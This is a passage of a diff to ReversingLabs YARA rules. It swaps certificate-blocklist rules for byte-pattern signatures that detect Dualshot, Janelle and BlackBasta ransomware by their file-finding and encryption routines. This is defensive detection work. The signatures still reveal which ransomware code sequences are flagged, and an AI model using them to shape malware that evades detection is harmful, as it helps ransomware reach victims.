 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Dualshot"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$internal_encrypt_file = {
+            02 28 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 0B 02 28 ?? ?? ?? ?? 0C 02 28 ?? ?? ?? ?? 03 28
+            ?? ?? ?? ?? 0D 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 09 16 09 8E 69 6F ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 28 ?? ?? ?? ?? 02 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ??
+            ?? 02 1B 19 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 00 02 28 ?? ?? ?? ?? DE ?? 26
+            DE ?? 2A
+        }
+		$encrypt_files_p1 = {
+            11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ??
+            8E 69 32 ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 11 ?? 13
+            ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ??
+            17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ??
+            ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 11
+            ?? 6F ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 06 72 ?? ?? ?? ?? 12 ?? 6F ?? ?? ?? ?? 26 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 1F ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12
+            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 72 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ??
+            ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 11 ??
+            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ??
+            26 DE ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 11 ??
+            A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 2C ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F
+            ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 11 ??
+            72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
+        }
+		$encrypt_files_p2 = {
+            02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 17 9A 28 ?? ?? ?? ?? 13 ?? 02
+            18 9A 28 ?? ?? ?? ?? 2C ?? 02 18 9A 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 02 18 9A 1B 19 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 02 18
+            9A 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 2A 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 12 ?? 6F ?? ?? ?? ?? 26 07 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 18 8D ?? ??
+            ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 00
+            1B 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 08 20 ?? ?? ??
+            ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2
+            25 1A 11 ?? 08 11 ?? 8E 69 6F ?? ?? ?? ?? 9A A2 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 11 ?? 6F ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F
+            ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11
+            ?? 1F ?? 3F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 25 17
+            6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 2A
+        }
+		$find_files_p1 = {
+            73 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 2C ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? 16 28 ?? ??
+            ?? ?? 02 8E 39 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 16 0D
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 17 0D 20 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 1F ?? 1B 28 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 13 ?? 6F ?? ?? ?? ?? 13 ?? 28
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ??
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 25 11 ?? 16 11
+            ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 13 ?? 1C 8D ?? ?? ?? ?? 25 16
+            72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ??
+            A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 13 ?? 1F ?? 8D ?? ?? ?? ?? 25 16 72
+            ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2
+            25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? A2 25 1D 72 ?? ??
+            ?? ?? A2 25 1E 72 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 72
+        }
+		$find_files_p2 = {
+            A2 13 ?? 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 1C 32 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 13 ??
+            16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ??
+            72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 13 ??
+            16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 2C ?? 12 ?? 11 ?? 8E 69 17 58 28 ?? ?? ?? ?? 11 ?? 11 ?? 16 6F ?? ?? ?? ?? 11 ??
+            A2 2B
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAK GmbH" and pe.signatures [ i ] . serial == "79:01:77:a5:42:09:d5:55:60:a5:5d:b9:7c:59:00:d6" and 1594080000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $internal_encrypt_file )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_048F7B5F67D8E2B3030F75Eb7Be2713D : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Janelle : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Janelle ransomware."
 		author = "ReversingLabs"
-		id = "e746516a-c51f-5cb8-8157-a5fe1f2c7abe"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "4fef3be5-8332-5ce2-b1e9-3993e6963331"
+		date = "2021-12-16"
+		modified = "2021-12-16"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4798-L4814"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6d1b47f3c9d7b90a5470f83a848adeebff2cf9341a1eb41ca8b45d08b469b17f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Janelle.yara#L1-L96"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "49f1eac82930606183ab9cf1d5c6c42534d58735876134793e9712e78eb5a4c7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Janelle"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$setup_env_p1 = {
+            00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 0A 06 02 7D ?? ??
+            ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 08 6F
+            ?? ?? ?? ?? 74 ?? ?? ?? ?? 0D 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 00 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 75 ?? ?? ?? ?? 13 ??
+            11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 02 7B ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 00 16 28 ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2C ?? 00 16
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 02 16 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 02 16 FE 01 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ??
+            12 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 00 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 02
+        }
+		$setup_env_p2 = {
+            7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2B ?? 00 16 28 ?? ?? ?? ?? 72 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 16
+            28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 16 28
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 02 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 16 28 ?? ?? ?? ??
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
+            ?? 11 ?? 2C ?? 00 02 17 7D ?? ?? ?? ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ??
+            ?? 25 17 6F ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 00 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 02
+            7B ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 00 00 2A
+        }
+		$find_files = {
+            73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 06 04 7D ?? ?? ?? ?? 06 05 7D ?? ?? ?? ?? 00 00
+            03 28 ?? ?? ?? ?? 0B 00 07 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 02 11 ?? 06 7B ?? ?? ?? ??
+            28 ?? ?? ?? ?? 00 00 09 17 58 0D 09 08 8E 69 32 ?? 06 7B ?? ?? ?? ?? 13 ?? 11 ?? 2C ??
+            00 00 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 06 7D ?? ??
+            ?? ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 00 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73
+            ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ??
+            8E 69 32 ?? 00 DE ?? 13 ?? 00 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE
+            ?? 00 00 DE ?? 26 00 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 2A
+        }
+		$encrypt_files = {
+            00 28 ?? ?? ?? ?? 0A 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 0B 28 ?? ?? ??
+            ?? 04 6F ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 00 09 18 6F ?? ?? ?? ?? 00 08 06 20 ?? ?? ?? ?? 73 ?? ?? ?? ??
+            13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F
+            ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 1A 6F ?? ?? ?? ?? 00 07 06 16 06
+            8E 69 6F ?? ?? ?? ?? 00 07 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 03 19 73 ?? ?? ??
+            ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 00 2B ?? 00 28 ?? ?? ?? ?? 00 11 ?? 11 ??
+            16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 FE
+            02 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 ?? 00 72 ?? ?? ?? ?? 11 ?? 6F
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE ?? 00 11 ?? 6F ?? ?? ?? ?? 00
+            07 6F ?? ?? ?? ?? 00 00 DC 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RITEIL SERVIS, OOO" and pe.signatures [ i ] . serial == "04:8f:7b:5f:67:d8:e2:b3:03:0f:75:eb:7b:e2:71:3d" and 1591142400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $setup_env_p* ) ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_082023879112289Bf351D297Cc8Efcfc : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Blackbasta : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BlackBasta ransomware."
 		author = "ReversingLabs"
-		id = "94a4e3d6-2d0a-5e5d-9ae8-574ef9be017e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "7a4ad567-0612-5a9c-8a06-4d615bc7e24a"
+		date = "2022-12-13"
+		modified = "2022-12-13"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4816-L4832"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "58bec160445765ce45a26bf9d96ba6cfe61eee31e0953009d40a7ec64920c677"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.BlackBasta.yara#L1-L293"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "79c81a4470e9eabbd714b1a91621c7b2bbe42d5371ba2c799529662d5f5c479a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BlackBasta"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 44 8B C9 EB ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 44 38
+            75 ?? 74 ?? 48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? EB ?? 44 38 75 ??
+            74 ?? 48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 45 8B CE 4C 8D 44 24 ?? 48 8B CF 48 8D 54
+            24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 4C 8D 45 ?? 85 C0 44 89 74 24 ?? 4C 89 74 24 ??
+            49 0F 45 CE 45 33 C9 33 D2 FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 4D 8B CC 45
+            33 C0 33 D2 48 8B CF E8 ?? ?? ?? ?? 8B D8 44 38 74 24 ?? 74 ?? 48 8B 4C 24 ?? E8 ??
+            ?? ?? ?? 8B C3 E9 ?? ?? ?? ?? 49 8B 74 24 ?? 49 2B 34 24 48 C1 FE ?? 33 D2 4C 89 75
+            ?? 48 8D 4D ?? 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 44 88 75 ?? E8 ?? ??
+            ?? ?? 48 8B 45 ?? B9 ?? ?? ?? ?? 39 48 ?? 75 ?? 44 38 75 ?? 74 ?? 48 8B 45 ?? 83 A0
+            ?? ?? ?? ?? ?? 44 8B C9 EB ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 44 38 75 ?? 74 ?? 48 8B 45
+            ?? 83 A0 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? EB ?? 44 38 75 ?? 74 ?? 48 8B 45 ?? 83 A0
+            ?? ?? ?? ?? ?? 45 8B CE 4C 8D 44 24 ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B
+            75 ?? 33 D2 85 C0 49 8B CE 48 0F 45 CA 80 39 ?? 75 ?? 8A 41 ?? 84 C0 75 ?? 38 55 ??
+            74 ?? 49 8B CE E8 ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 38 51 ?? 74 ?? 4D 8B CC 4D 8B C5 48
+            8B D7 E8 ?? ?? ?? ?? 44 8B E8 85 C0 75 ?? 38 45 ?? 74 ?? 49 8B CE E8 ?? ?? ?? ?? 4C
+            8B 6C 24 ?? 48 8D 55 ?? 48 8B CB FF 15 ?? ?? ?? ?? 45 33 F6 85 C0 0F 85 ?? ?? ?? ??
+            49 8B 04 24 49 8B 54 24 ?? 48 2B D0 48 C1 FA ?? 48 3B F2 74 ?? 48 2B D6 48 8D 0C F0
+            4C 8D 0D ?? ?? ?? ?? 45 8D 46 ?? E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 44 38 74
+            24 ?? 74 ?? 48 8B 4C 24
+        }
+		$find_system_volumes_v1_p1 = {
+            48 89 4C 24 ?? 55 53 56 57 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ??
+            48 8B F1 45 33 FF 44 89 7C 24 ?? 4C 89 39 4C 89 79 ?? 4C 89 79 ?? C7 44 24 ?? ?? ??
+            ?? ?? BA ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 0F 1F 00 4C 8D 8D ??
+            ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 44 89 7C 24 ?? 4C 89 7C 24 ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24
+            ?? 4C 89 7C 24 ?? 45 33 C9 45 33 C0 33 D2 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8D 14 00 48 8D BD ?? ?? ?? ?? 48 03 FA 4C 89 7C 24 ?? 4C 89
+            7C 24 ?? 4C 89 7C 24 ?? 4C 89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48
+            8D 9D ?? ?? ?? ?? 48 D1 FA 48 83 FA ?? 72 ?? 45 33 C0 48 8D 4C 24 ?? E8
+        }
+		$find_system_volumes_v1_p2 = {
+            4C 89 7C 24 ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 3B C7 74
+            ?? 66 66 66 0F 1F 84 00 ?? ?? 00 00 44 0F B6 0B 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 3B
+            CA 73 ?? 48 8D 41 ?? 48 89 44 24 ?? 48 8D 44 24 ?? 48 83 FA ?? 48 0F 43 44 24 ?? 44
+            88 0C 08 C6 44 08 ?? ?? EB ?? 45 33 C0 41 8D 50 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48
